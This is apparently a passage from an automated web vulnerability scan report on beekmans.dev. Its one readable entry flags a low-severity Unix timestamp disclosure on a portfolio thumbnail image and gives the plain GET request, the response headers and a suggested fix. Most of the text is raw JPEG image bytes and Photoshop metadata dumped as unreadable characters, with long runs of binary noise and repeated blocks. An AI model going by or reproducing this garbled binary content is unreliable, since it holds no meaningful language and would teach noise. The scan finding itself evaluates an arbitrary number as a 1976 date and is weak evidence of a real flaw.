ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          182272822
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        39. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          192261204, which evaluates to: 1976-02-04 06:53:24

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙ8BIM!WAdobe PhotoshopAdobe Photoshop 20208BIMÿá+Yhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2015-08-12T08:40:52-06:00" xmp:MetadataDate="2019-12-03T13:35:22-07:00" xmp:ModifyDate="2019-12-03T13:35:22-07:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" xmpMM:DocumentID="adobe:docid:photoshop:90dc98be-e3c9-bd43-aa6c-4c8d5ec2c480" xmpMM:OriginalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" stEvt:when="2015-08-12T08:40:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:c59fedb7-5aae-dc44-806c-a9ae14d83653" stEvt:when="2015-08-12T10:34:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> 